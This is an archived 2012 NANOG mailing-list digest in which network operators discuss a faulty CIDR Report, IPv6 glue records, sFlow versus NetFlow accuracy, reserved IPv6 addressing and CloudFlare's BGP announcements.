21:10:00 2012 AEST. > The report analyses the BGP Routing Table of AS2.0 router > and generates a report on aggregation potential within the table. > > Check http://www.cidr-report.org for a current version of this report. > > Recent Table History > Date Prefixes CIDR Agg > 06-07-12 418603 242444 > 07-07-12 418670 242326 > 08-07-12 418651 242260 > 09-07-12 417976 242235 > 10-07-12 418251 242235 > 11-07-12 0 242235 > 12-07-12 0 242235 > 13-07-12 0 242235 Ahhh, oops? Geoff, might want to check your scripts. -- TTFN, patrick > AS Summary > 0 Number of ASes in routing system > 0 Number of ASes announcing only one prefix > 3390 Largest number of prefixes announced by an AS > AS6389 : BELLSOUTH-NET-BLK - BellSouth.net Inc. > 0 Largest address span announced by an AS (/32s) > ????? : BELLSOUTH-NET-BLK - BellSouth.net Inc. > > > Aggregation Summary > The algorithm used in this report proposes aggregation only > when there is a precise match using the AS path, so as > to preserve traffic transit policies. Aggregation is also > proposed across non-advertised address space ('holes'). > > --- 13Jul12 --- > ASnum NetsNow NetsAggr NetGain % Gain Description > > Table 418251 242235 176016 42.1% All ASes > > AS6389 3390 190 3200 94.4% BELLSOUTH-NET-BLK - > BellSouth.net Inc. > AS7029 3281 1636 1645 50.1% WINDSTREAM - Windstream > Communications Inc > AS17974 2146 606 1540 71.8% TELKOMNET-AS2-AP PT > Telekomunikasi Indonesia > AS22773 1655 136 1519 91.8% ASN-CXA-ALL-CCI-22773-RDC - > Cox Communications Inc. > AS4766 2710 1251 1459 53.8% KIXS-AS-KR Korea Telecom > AS18566 2088 706 1382 66.2% COVAD - Covad Communications > Co. > AS28573 1986 622 1364 68.7% NET Servicos de Comunicao S.A. > AS2118 1288 15 1273 98.8% RELCOM-AS OOO "NPO Relcom" > AS4323 1576 386 1190 75.5% TWTC - tw telecom holdings, > inc. > AS1785 1934 814 1120 57.9% AS-PAETEC-NET - PaeTec > Communications, Inc. > AS10620 1983 897 1086 54.8% Telmex Colombia S.A. > AS4755 1612 561 1051 65.2% TATACOMM-AS TATA > Communications formerly VSNL > is Leading ISP > AS7303 1452 457 995 68.5% Telecom Argentina S.A. > AS7552 1124 234 890 79.2% VIETEL-AS-AP Vietel > Corporation > AS8151 1491 687 804 53.9% Uninet S.A. de C.V. > AS18101 946 161 785 83.0% RELIANCE-COMMUNICATIONS-IN > Reliance Communications > Ltd.DAKC MUMBAI > AS17908 827 60 767 92.7% TCISL Tata Communications > AS4808 1106 352 754 68.2% CHINA169-BJ CNCGROUP IP > network China169 Beijing > Province Network > AS9394 888 162 726 81.8% CRNET CHINA RAILWAY > Internet(CRNET) > AS13977 839 123 716 85.3% CTELCO - FAIRPOINT > COMMUNICATIONS, INC. > AS8452 1166 518 648 55.6% TE-AS TE-AS > AS3356 1106 465 641 58.0% LEVEL3 Level 3 Communications > AS855 695 58 637 91.7% CANET-ASN-4 - Bell Aliant > Regional Communications, Inc. > AS17676 692 75 617 89.2% GIGAINFRA Softbank BB Corp. > AS4780 841 245 596 70.9% SEEDNET Digital United Inc. > AS22561 1023 428 595 58.2% DIGITAL-TELEPORT - Digital > Teleport Inc. > AS19262 998 405 593 59.4% VZGNI-TRANSIT - Verizon Online > LLC > AS24560 1036 448 588 56.8% AIRTELBROADBAND-AS-AP Bharti > Airtel Ltd., Telemedia > Services > AS3549 993 436 557 56.1% GBLX Global Crossing Ltd. > AS4804 649 97 552 85.1% MPX-AS Microplex PTY LTD > > Total 43521 13231 30290 69.6% Top 30 total > > > Possible Bogus Routes > > 10.86.64.32/30 AS65530 -Private Use AS- > 10.86.64.36/30 AS65530 -Private Use AS- > 10.86.65.32/30 AS65530 -Private Use AS- > 10.86.65.36/30 AS65530 -Private Use AS- > 10.255.255.0/30 AS65530 -Private Use AS- > 10.255.255.4/30 AS65530 -Private Use AS- > 10.255.255.8/30 AS65530 -Private Use AS- > 14.192.0.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.4.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.8.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.12.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.16.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.20.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.24.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 14.192.28.0/22 AS45464 NEXTWEB-AS-AP Room 201, TGU Bldg > 27.112.114.0/24 AS23884 PROENNET-AS Proimage Engineering and Communication Co.,Ltd. > 62.61.220.0/24 AS24974 TACHYON-EU Tachyon Europe BV > 62.61.221.0/24 AS24974 TACHYON-EU Tachyon Europe BV > 64.66.32.0/20 AS18864 > 66.171.32.0/20 AS705 UUNET - MCI Communications Services, Inc. d/b/a Verizon Business > 66.180.239.0/24 AS35888 VIGNETTE - VIGNETTE CORPORATION > 66.207.32.0/20 AS23011 > 66.245.176.0/20 AS19318 NJIIX-AS-1 - NEW JERSEY INTERNATIONAL INTERNET EXCHANGE LLC > 66.251.128.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.133.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.134.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.136.0/21 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.140.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.141.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.142.0/24 AS33227 BLUEBRIDGE-NETWORKS - Blue Bridge Networks > 66.251.143.0/24 AS3356 LEVEL3 Level 3 Communications > 69.46.224.0/20 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 69.46.233.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 69.46.236.0/24 AS32592 HUNT-BROTHERS-OF-LOUISIANA-LLC - Hunt Brothers > 70.34.112.0/20 AS27589 MOJOHOST - MOJOHOST > 71.19.134.0/23 AS3313 INET-AS BT Italia S.p.A. > 72.35.224.0/22 AS30097 NUWAVE - NuWave > 72.35.229.0/24 AS30188 TELEVERGENCE - Televergence Solutions Inc. > 72.35.232.0/21 AS30097 NUWAVE - NuWave > 72.44.16.0/20 AS15054 HAMELTRONICS - Hameltronics, LLC > 74.91.48.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.49.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.50.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.51.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.52.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.53.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.54.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.55.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.56.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.57.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.58.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.59.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.60.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.61.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.62.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.91.63.0/24 AS30137 SEA-BROADBAND - Sea Broadband, LLC > 74.115.124.0/23 AS46540 > 74.115.126.0/24 AS11260 EASTLINK-HSI - EastLink > 81.22.64.0/20 AS5511 OPENTRANSIT France Telecom S.A. > 82.101.160.0/19 AS5511 OPENTRANSIT France Telecom S.A. > 110.34.44.0/22 AS12653 COMTONET KB Impuls Hellas S.A. > 116.206.72.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 116.206.85.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 116.206.103.0/24 AS6461 MFNX MFN - Metromedia Fiber Network > 117.120.56.0/21 AS4755 TATACOMM-AS TATA Communications formerly VSNL is Leading ISP > 120.136.17.0/24 AS38779 BMG-AS-ID Badan Meteorologi dan Geofisika > 121.46.0.0/16 AS4134 CHINANET-BACKBONE No.31,Jin-rong Street > 142.54.0.0/19 AS23498 CDSI - Cogeco Data Services LP > 172.14.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. > 172.15.0.0/24 AS57871 ASTELECENTR TeleCentr Ltd. > 172.45.1.0/24 AS3356 LEVEL3 Level 3 Communications > 172.102.0.0/22 AS4812 CHINANET-SH-AP China Telecom (Group) > 172.116.0.0/24 AS7018 ATT-INTERNET4 - AT&T Services, Inc. > 198.18.0.0/15 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 198.51.100.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 200.1.112.0/24 AS29754 GO2TEL GO2TEL.COM INC. > 200.6.49.0/24 AS23148 TERREMARK Terremark > 200.24.73.0/24 AS26061 Equant Colombia > 200.33.40.0/24 AS11172 Alestra, S. de R.L. de C.V. > 200.34.0.0/20 AS6342 Instituto Tecnol?gico y de Estudios Superiores de Monterrey > 200.53.0.0/19 AS13878 Diveo do Brasil Telecomunicacoes Ltda > 200.58.248.0/21 AS27849 > 200.75.184.0/21 AS14754 Telgua > 200.106.128.0/20 AS3257 TINET-BACKBONE Tinet SpA > 200.115.112.0/20 AS3257 TINET-BACKBONE Tinet SpA > 202.1.224.0/24 AS10097 FLOWCOM Flow Communications 2/541 Kent St Sydney NSW 2000 > 202.8.106.0/24 AS9530 SHINSEGAE-AS SHINSEGAE I&C Co., Ltd. > 202.58.113.0/24 AS19161 > 202.83.120.0/21 AS37972 > 202.83.124.0/24 AS37972 > 202.83.125.0/24 AS37972 > 202.83.126.0/24 AS37972 > 202.94.1.0/24 AS4808 CHINA169-BJ CNCGROUP IP network China169 Beijing Province Network > 202.140.128.0/19 AS9583 SIFY-AS-IN Sify Limited > 202.174.125.0/24 AS9498 BBIL-AP BHARTI Airtel Ltd. > 202.176.1.0/24 AS9942 COMINDICO-AP SOUL Converged Communications Australia > 202.179.134.0/24 AS23966 LDN-AS-PK LINKdotNET Telecom Limited > 203.0.113.0/24 AS14744 INTERNAP-BLOCK-4 - Internap Network Services Corporation > 203.23.1.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.24.38.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.30.127.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.86.0/23 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.86.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.87.0/24 AS18111 NETSPEED-AS-AP Netspeed Internet Communications > 203.32.188.0/24 AS1221 ASN-TELSTRA Telstra Pty Ltd > 203.142.219.0/24 AS45149 > 204.9.116.0/22 AS30097 NUWAVE - NuWave > 204.10.88.0/21 AS3356 LEVEL3 Level 3 Communications > 204.10.92.0/23 AS30097 NUWAVE - NuWave > 204.10.94.0/23 AS30097 NUWAVE - NuWave > 204.14.0.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.0.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.2.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 204.14.3.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 205.175.214.0/24 AS5583 ORANGE-BUSINESS-SERVICES-BENELUX France Telecom S.A. > 206.197.184.0/24 AS23304 DATOTEL-STL-AS - Datotel LLC, a NetLabs LLC Company > 207.174.131.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.132.0/23 AS26116 INDRA - Indra's Net Inc > 207.174.152.0/23 AS26116 INDRA - Indra's Net Inc > 207.174.154.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.155.0/24 AS26116 INDRA - Indra's Net Inc > 207.174.200.0/24 AS22658 EARTHNET - Earthnet, Inc. > 207.174.248.0/21 AS6653 PRIVATEI - privateI, LLC > 207.231.96.0/19 AS11194 NUNETPA - NuNet Inc. > 208.83.53.0/24 AS40569 YGOMI-AS - Ygomi LLC > 208.93.144.0/21 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 208.93.151.0/24 AS30693 EONIX-CORPORATION-AS-PHX01-WWW-INFINITIE-NET - Eonix Corporation > 209.148.64.0/19 AS13773 TELNETCOMM - Telnet Communications > 209.177.64.0/20 AS6461 MFNX MFN - Metromedia Fiber Network > 209.213.0.0/20 AS33005 ELTOPIA - Eltopia.com, LLC > 213.150.202.0/24 AS8513 SKYVISION SkyVision Global Networks Ltd > 213.150.204.0/24 AS29338 AFOL-AS Used by Africaonline Operations > 216.12.160.0/20 AS26627 AS-PILOSOFT - Pilosoft, Inc. > 216.21.160.0/20 AS27876 American Data Networks > 216.155.176.0/20 AS16706 > 216.194.160.0/20 AS27876 American Data Networks > > > Please see http://www.cidr-report.org for the full report > > ------------------------------------ > Copies of this report are mailed to: > nanog at nanog.org > eof-list at ripe.net > apops at apops.net > routing-wg at ripe.net > afnog at afnog.org > From merlyn at geeks.org Sat Jul 14 01:06:59 2012 From: merlyn at geeks.org (Doug McIntyre) Date: Sat, 14 Jul 2012 01:06:59 -0500 Subject: Netsol AAAA glue In-Reply-To: References: Message-ID: <20120714060659.GA46015@geeks.org> On Fri, Jul 13, 2012 at 08:52:27AM -0400, Jared Mauch wrote: > On Jul 13, 2012, at 8:43 AM, Brandon Applegate wrote: > > > So I sent an email over a week ago to ipv6req at networksolutions.com - and since I've only recieved the auto reply. ... > As long as you're not 1 year into a 10 year renewal, you may want to consider just moving your domains to another registrar such as opensrs. Drawback of using OpenSRS is they don't do DS records for dnssec, if that's a requirement as well, I believe Dyn has a good service for this (or so I read in the OpenSRS forums). Not sure why you'd be worried about a 10-year renewal, any registrar transfer just add on time to existing expiration, you don't lose anything. OpenSRS does (now) have online IPv6 glue-record editing. They can insert DS records by hand if you email into their support department (assuming you are the reseller and you have access to their support department, otherwise you have to work through your reseller). Still, not as nice as online access, but it is workable. From lukasz at bromirski.net Sat Jul 14 03:30:25 2012 From: lukasz at bromirski.net (=?ISO-8859-2?Q?=A3ukasz_Bromirski?=) Date: Sat, 14 Jul 2012 10:30:25 +0200 Subject: Real world sflow vs netflow? In-Reply-To: References: Message-ID: <50012E21.4060802@bromirski.net> On 7/13/12 10:20 PM, Peter Phaal wrote: > 1. NetFlow: Packets are decoded on the router, flow keys are extracted > and used to lookup/create an entry in a flow cache which is then > updated based on values in the packet. Records are exported from the > flow cache in the form of Netflow datagrams when the flow completes or > based on a timeout. This is because NetFlow is based on the Flows, where sFlow name is misleading - it's actually PACKET monitoring technology, not FLOW monitoring. So the difference in the way both mechanisms work is inline with their definition. > 2. sFlow: Packets are randomly sampled in hardware and the packet > headers are immediately exported as sFlow datagrams - there is no flow > cache on the switch/router. And that's the biggest problem with sFlow. Packets are sampled, not flows. You may miss the big or important flow, you don't have visibility into every conversation going through the device. sFlow and randomized sampling rely heavily on statistics, but as soon as you agree on that, you'll loose accuracy right away. > Moving the flow cache off the router has a number of benefits: > 1. You are no longer limited by the hardware/firmware capabilities of > the router - your analysis software decides which fields to decode and > how to accumulate results. For example, if you are managing a mixed > IPv4/IPv6 environment you can decide to use sFlow to look into v6 over > v4 and v4 over v6 tunnels (to do the same thing with Netflow would > likely require a hardware upgrade). You can even feed sFlow into > Wireshark for detailed analysis of protocols and packet headers. NetFlow supports IPv6. As well as L2 traffic (v9), MPLS, multicast and so on. > 2. Operational complexity is greatly reduced since the configuration > options and resource management issues associated with the flow cache > are eliminated. That will depend on the device and the options. It takes around 3-4 commands to configure the export and then one to activate it without any templates on a interface on Cisco device. What's more important, you can have multiple monitors on one interface monitoring & exporting different sets of traffic to different groups within company (Security, Network Monitoring, Trafic Engineering). sFlow gives just sampled packets. > 3. Low latency. Measurements aren't delayed by the flow cache - you > can detect DDoS attacks/large flows within seconds. The same with NetFlow. Cache can be actively flushed. > 4. Scalability - you can turn on sFlow on every link (even 100G > links), on every device for a comprehensive view of traffic. Same with NetFlow & sampling turned on. > However, there are a wide range of Netflow > sampling implementations, many of which yield questionable results. In > contrast, the sFlow standard specifies how sampling must be performed > and ensures that information is included that allows the sampled data > to be correctly scaled and produce unbiased measurements. The measurements provided by sFlow are only approximation of the real traffic and while it may be acceptable on LAN links where details don't matter as much, it's hardly good enough to present a real view on the WAN links. sFlow was built to work on switches and provide "some" accuracy, it's not good enough (unless you do sampling on a 1:5-1:10 basis) to do billing or some detailed analysis of traffic: http://www.inmon.com/pdf/sFlowBilling.pdf You can use it to *estimate* the traffic, detect DDoS, sure. But the data & scaling used by sFlow (and additionally tricks used by ASIC vendors implementing it in the hardware) can't change the fundamental difference - sFlow is really sPacket, as it doesn't deal with flows. NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling accuracy and things like that, but working with flows is more accurate. -- "There's no sense in being precise when | ?ukasz Bromirski you don't know what you're talking | jid:lbromirski at jabber.org about." John von Neumann | http://lukasz.bromirski.net From swmike at swm.pp.se Sat Jul 14 04:15:30 2012 From: swmike at swm.pp.se (Mikael Abrahamsson) Date: Sat, 14 Jul 2012 11:15:30 +0200 (CEST) Subject: Real world sflow vs netflow? In-Reply-To: <50012E21.4060802@bromirski.net> References: <50012E21.4060802@bromirski.net> Message-ID: On Sat, 14 Jul 2012, ?ukasz Bromirski wrote: > NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling accuracy > and things like that, but working with flows is more accurate. If you do 1:1000 sampling with both Netflow and sFlow, why would one of them be more accurate than the other? If you analyze the flow on the device or on the collector (as might be done with sFlow), I don't see why one would be btter than the other. -- Mikael Abrahamsson email: swmike at swm.pp.se From eugen at leitl.org Sat Jul 14 04:44:25 2012 From: eugen at leitl.org (Eugen Leitl) Date: Sat, 14 Jul 2012 11:44:25 +0200 Subject: The Cidr Report In-Reply-To: References: <1342201312.41321.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201373.41095.YahooMailNeo@web140806.mail.bf1.yahoo.com> <1342201407.17705.YahooMailNeo@web140802.mail.bf1.yahoo.com> <1342201439.60327.YahooMailNeo@web140806.mail.bf1.yahoo.com> Message-ID: <20120714094425.GV12615@leitl.org> On Sat, Jul 14, 2012 at 03:48:47AM +1000, Skeeve Stevens wrote: > I think the effort to moderate this particular list would be far to much > effort. Most mailing lists allow moderation of new list members by default. Typically, the moderation is removed after the first non-spam post. This causes negligible workload in general. From joseph.snyder at gmail.com Sat Jul 14 06:23:15 2012 From: joseph.snyder at gmail.com (joseph.snyder at gmail.com) Date: Sat, 14 Jul 2012 07:23:15 -0400 Subject: using "reserved" IPv6 space In-Reply-To: References: <500032E4.40804@gmail.com> <500042B5.4030502@gmail.com> <42FE7891-32BC-4C67-B814-D37D74EE0581@delong.com> Message-ID: <55022963-48d8-480d-8052-6f6b5f38ee9c@email.android.com> If it is a hostile lab environment, then pre decide on the address space to be used by the company and auto include that into all production routers policies to drop it like a hot potatoes covered in lava. Brandon Ross wrote: On Fri, 13 Jul 2012, Owen DeLong wrote: > On Jul 13, 2012, at 4:24 PM, Randy Bush wrote: > >> keep life simple. use global ipv6 space. >> >> randy > > Though it is rare, this is one time when I absolutely agree with Randy. It's even more rare for me to agree with Randy AND Owen at the same time. -- Brandon Ross Yahoo & AIM: BrandonNRoss +1-404-635-6667 ICQ: 2269442 Schedule a meeting: https://tungle.me/bross Skype: brandonross From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Sat Jul 14 06:34:37 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Sat, 14 Jul 2012 13:34:37 +0200 Subject: CloudFlare IPv6 BGP announcements - WTF guys? Message-ID: <24418314.De6TB4VHBp@lsdsrv> So, doing a "sh bgp ipv6 uni 2400:cb00::/32 long" reveals that CloudFlare are currently announcing a bunch of /48s to the rest of the internet through nLayer only - as far as I can see. Simple suggestion: announce the /32 to the internet from all peering points like good Netizens and then announce your /48s from whatever peering it is you want the traffic sent to and tag it with the NO_EXPORT community attribute so you're not spamming up everyone's tables or hoisting yourselves by your own petard by getting filtered out. Kind Regards, Oliver From randy at psg.com Sat Jul 14 07:22:16 2012 From: randy at psg.com (Randy Bush) Date: Sat, 14 Jul 2012 21:22:16 +0900 Subject: CloudFlare IPv6 BGP announcements - WTF guys? In-Reply-To: <24418314.De6TB4VHBp@lsdsrv> References: <24418314.De6TB4VHBp@lsdsrv> Message-ID: > So, doing a "sh bgp ipv6 uni 2400:cb00::/32 long" reveals that > CloudFlare are currently announcing a bunch of /48s to the rest > of the internet through nLayer only - as far as I can see. gossip is cloudflare has most, of not all, eggs in one basket, but a pollute commons routing policy. sad to say, this is not uncommon, just unwise. check for it when they put out the s1. randy From asullivan at dyn.com Sat Jul 14 09:14:08 2012 From: asullivan at dyn.com (Andrew Sullivan) Date: Sat, 14 Jul 2012 10:14:08 -0400 Subject: Netsol AAAA glue In-Reply-To: <20120714060659.GA46015@geeks.org> References: <20120714060659.GA46015@geeks.org> Message-ID: <20120714141408.GB94619@dyn.com> On Sat, Jul 14, 2012 at 01:06:59AM -0500, Doug McIntyre wrote: > Not sure why you'd be worried about a 10-year renewal, any registrar > transfer just add on time to existing expiration, you don't lose anything. This isn't true in ICANN-contracted registries. The maximum period is 10 years, absolutely, so if you have 10 years to go and you pay for a transfer you lose the additional year's payment. Best, A -- Andrew Sullivan Dyn Labs asullivan at dyn.com From valdis.kletnieks at vt.edu Sat Jul 14 10:43:45 2012 From: valdis.kletnieks at vt.edu (valdis.kletnieks at vt.edu) Date: Sat, 14 Jul 2012 11:43:45 -0400 Subject: Netsol AAAA glue In-Reply-To: Your message of "Sat, 14 Jul 2012 10:14:08 -0400." <20120714141408.GB94619@dyn.com> References: <20120714060659.GA46015@geeks.org> <20120714141408.GB94619@dyn.com> Message-ID: <37944.1342280625@turing-police.cc.vt.edu> On Sat, 14 Jul 2012 10:14:08 -0400, Andrew Sullivan said: > On Sat, Jul 14, 2012 at 01:06:59AM -0500, Doug McIntyre wrote: > > Not sure why you'd be worried about a 10-year renewal, any registrar > > transfer just add on time to existing expiration, you don't lose anything. > > This isn't true in ICANN-contracted registries. The maximum period is > 10 years, absolutely, so if you have 10 years to go and you pay for a > transfer you lose the additional year's payment. Oh, come *on* guys. How much does a bleeping domain *cost*? Under what conditions does "zomg I'm gonna lose the other 9 years" actually outweigh the aggrivation? Either you're paying $8.95 a year, at which point obsessing about it for more than an hour costs more than the domain, or you;re paying $100 a year for some premium support that you're obviously not getting - at which point it's obvious you've made a bad business decision and you should cut your losses. (Yes, I know the *real* problem is getting your business offfice to issue payment to the new registrar, and then fixing your internal procediures and documentation to match what the new regisrar wants. and the other real problem is that the registrar race to the bottom means *none* of them do everything you need/want...) -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 865 bytes Desc: not available URL: From lost at l-w.ca Sat Jul 14 11:03:53 2012 From: lost at l-w.ca (William Astle) Date: Sat, 14 Jul 2012 10:03:53 -0600 Subject: Netsol AAAA glue In-Reply-To: <37944.1342280625@turing-police.cc.vt.edu> References: <20120714060659.GA46015@geeks.org> <20120714141408.GB94619@dyn.com> <37944.1342280625@turing-police.cc.vt.edu> Message-ID: <50019869.4080808@l-w.ca> On 12-07-14 09:43 AM, valdis.kletnieks at vt.edu wrote: > On Sat, 14 Jul 2012 10:14:08 -0400, Andrew Sullivan said: >> This isn't true in ICANN-contracted registries. The maximum period is >> 10 years, absolutely, so if you have 10 years to go and you pay for a >> transfer you lose the additional year's payment. > > Oh, come *on* guys. How much does a bleeping domain *cost*? Under what > conditions does "zomg I'm gonna lose the other 9 years" actually outweigh the > aggrivation? You don't lose the other 9 years. You just don't get an 11th year if the new renewal date would then be more than 10 years out. For what it's worth, .ca (non-ICANN) works the same way. From jerome at ceriz.fr Sat Jul 14 11:08:40 2012 From: jerome at ceriz.fr (=?ISO-8859-1?Q?J=E9r=F4me_Nicolle?=) Date: Sat, 14 Jul 2012 18:08:40 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <500032E4.40804@gmail.com> References: <500032E4.40804@gmail.com> Message-ID: <50019988.5080108@ceriz.fr> Le 13/07/12 16:38, -Hammer- a ?crit : > In the past, with IPv4, we have used reserved or "non-routable" I guess "non-routable IPv4" translates well to "non-routable IPv6", thus putting Link-Local addresses on top of the list. Thought you may use th auto-configured addresses for that purpose, you also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and set such LLA to every gateways to make routing tables more legible, those ID beeing arbitrary 16bit values. Any other address class will work well, but I'd rather not use reserved space outside of GUA, ULA our LLA scopes to avoid bug-hunting on poorly implemented IPv6 stacks. -- J?r?me Nicolle +33 6 19 31 27 14 From owen at delong.com Sat Jul 14 11:18:48 2012 From: owen at delong.com (Owen DeLong) Date: Sat, 14 Jul 2012 09:18:48 -0700 Subject: using "reserved" IPv6 space In-Reply-To: <50019988.5080108@ceriz.fr> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> Message-ID: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> On Jul 14, 2012, at 9:08 AM, J?r?me Nicolle wrote: > Le 13/07/12 16:38, -Hammer- a ?crit : >> In the past, with IPv4, we have used reserved or "non-routable" > > I guess "non-routable IPv4" translates well to "non-routable IPv6", thus > putting Link-Local addresses on top of the list. > > Thought you may use th auto-configured addresses for that purpose, you > also may set LLAs to your liking. I use fe80::zone_ID:interface_ID , and > set such LLA to every gateways to make routing tables more legible, > those ID beeing arbitrary 16bit values. > Given that zone_IDs in my environments consist of terms like: fxp0 en0 eth0 ge-0/0/0.0 etc. How, exactly, would you turn those into part of an IPv6 address? > Any other address class will work well, but I'd rather not use reserved > space outside of GUA, ULA our LLA scopes to avoid bug-hunting on poorly > implemented IPv6 stacks. +1 However, I still think GUA is the best, most flexible choice. Owen From lukasz at bromirski.net Sat Jul 14 12:15:58 2012 From: lukasz at bromirski.net (=?ISO-8859-2?Q?=A3ukasz_Bromirski?=) Date: Sat, 14 Jul 2012 19:15:58 +0200 Subject: Real world sflow vs netflow? In-Reply-To: References: <50012E21.4060802@bromirski.net> Message-ID: <5001A94E.20703@bromirski.net> On 7/14/12 11:15 AM, Mikael Abrahamsson wrote: > On Sat, 14 Jul 2012, ?ukasz Bromirski wrote: > >> NetFlow, jFlow, IPFIX deal with flows. You can discuss sampling >> accuracy and things like that, but working with flows is more accurate. > > If you do 1:1000 sampling with both Netflow and sFlow, why would one of > them be more accurate than the other? If you analyze the flow on the > device or on the collector (as might be done with sFlow), I don't see > why one would be btter than the other. Sure, but with sampling you'll loose accuracy anyway. The difference is subtle, and depends on the (Net|j)Flow implementation - on some devices for sampled NetFlow you'll still get sampled FLOWS (1:x) not sampled PACKETS (thus disregarding the flow advantage). -- "There's no sense in being precise when | ?ukasz Bromirski you don't know what you're talking | jid:lbromirski at jabber.org about." John von Neumann | http://lukasz.bromirski.net From shrdlu at deaddrop.org Sat Jul 14 13:07:08 2012 From: shrdlu at deaddrop.org (Lynda) Date: Sat, 14 Jul 2012 11:07:08 -0700 Subject: Calling Geoff Huston (was Re: The REAL Cidr Report) In-Reply-To: References: <201207132200.q6DM00xM047173@wattle.apnic.net> Message-ID: <5001B54C.4000804@deaddrop.org> I changed the subject header on this since I'm quite sure most folks ignored it due to the "problem" emails. Not only was this one off (and late by a few hours), but I never saw a sign that the BGP report was even sent (and it's not in the archives, either). On 7/13/2012 10:52 PM, Patrick W. Gilmore wrote: > Composed on a virtual keyboard, please forgive typos. > On Jul 13, 2012, at 22:00, cidr-report at potaroo.net wrote: >> This report has been generated at Fri Jul 13 21:10:00 2012 AEST. >> The report analyses the BGP Routing Table of AS2.0 router >> and generates a report on aggregation potential within the table. >> >> Check http://www.cidr-report.org for a current version of this report. >> Recent Table History >> Date Prefixes CIDR Agg >> 06-07-12 418603 242444 >> 07-07-12 418670 242326 >> 08-07-12 418651 242260 >> 09-07-12 417976 242235 >> 10-07-12 418251 242235 >> 11-07-12 0 242235 >> 12-07-12 0 242235 >> 13-07-12 0 242235 > > Ahhh, oops? > > Geoff, might want to check your scripts. Yep. BCC to Geoff, also, just in case. -- Politicians are like a Slinky. They're really not good for anything, but they still bring a smile to your face when you push them down a flight of stairs. From olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa Sat Jul 14 14:49:48 2012 From: olipro at 8.c.9.b.0.7.4.0.1.0.0.2.ip6.arpa (Oliver) Date: Sat, 14 Jul 2012 21:49:48 +0200 Subject: using "reserved" IPv6 space In-Reply-To: <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> References: <500032E4.40804@gmail.com> <50019988.5080108@ceriz.fr> <5FD8053D-597D-4495-9BF7-A7FC64D4CB58@delong.com> Message-ID: <18152610.mKBk0sXnsk@lsdsrv> On Saturday 14 July 2012 09:18:48 Owen DeLong wrote: > Given that zone_IDs in my environments consist of terms like: > > fxp0 > en0 > eth0 > ge-0/0/0.0 > etc. > > How, exactly, would you turn those into part of an IPv6 address? UTF-8? ASCII? if you go with a custom encoding and do 0-9,a-z, plus a few symbols you can get 6 bits per char for a grand total of 10 chars squeezed into 8 octets. > > > Any other address class will work well, but I'd rather not use reserved > > space outside of GUA, ULA our LLA 